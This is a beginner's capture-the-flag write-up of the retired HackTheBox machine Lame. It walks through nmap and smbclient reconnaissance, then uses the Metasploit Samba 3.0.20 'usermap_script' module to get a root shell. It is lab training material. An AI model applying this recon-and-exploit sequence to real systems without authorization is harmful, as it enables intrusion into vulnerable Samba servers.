HackTheBox: Lame Writeup
Lame is a retired HTB machine.
Recon
As usual, start off with an nmap scan:
$ nmap -Pn -sV -sC 10.10.10.3 -oN nmap_scan.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times
will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-24 11:46 EDT
Nmap scan report for 10.10.10.3
Host is up (0.13s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.8
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h04m46s, deviation: 2h49m44s, median: 4m44s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2021-03-24T11:51:10-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.03 seconds
Lots of interesting findings! We see that the target OS is Unix and there are FTP, SSH, and Samba servers running.
Since we specified -sC, the nmap scan determined that anonymous FTP login is
allowed. I explored this for a bit, but did not find anything interesting on
the server.
The same is true for the Samba server. Running smbclient -L shows that there are
several shares listed:
$ smbclient -L //10.10.10.3/
Enter WORKGROUP\kali's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME
I searched the shares, but again, nothing interesting was found.
Since there aren’t any leaked credentials or other obvious leads, let’s search around for an exploit. In my experience with CTFs, if Samba is running then it is usually exploitable. Let’s search for a Samba 3.0.20 exploit!
Exploitation
There is only one module available in metasploit when searching searching for Samba 3.0.20:
> search samba 3.0.20
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Well, this makes our job easy!
Set the RHOSTS and LHOST options to the correct IP addresses and run the exploit. After a few seconds you should get a root shell! (Note: there is no prompt)
whoami
root
id
uid=0(root) gid=0(root)
From here the user and root flags can be found in /home/makis/user.txt and /root/root.txt respectively.
Concluding Thoughts
Lame is a pretty straight-forward machine that is great for beginners. I probably spent too much time on the FTP and Samba share rabbit holes, but oh well, I didn’t want to miss anything.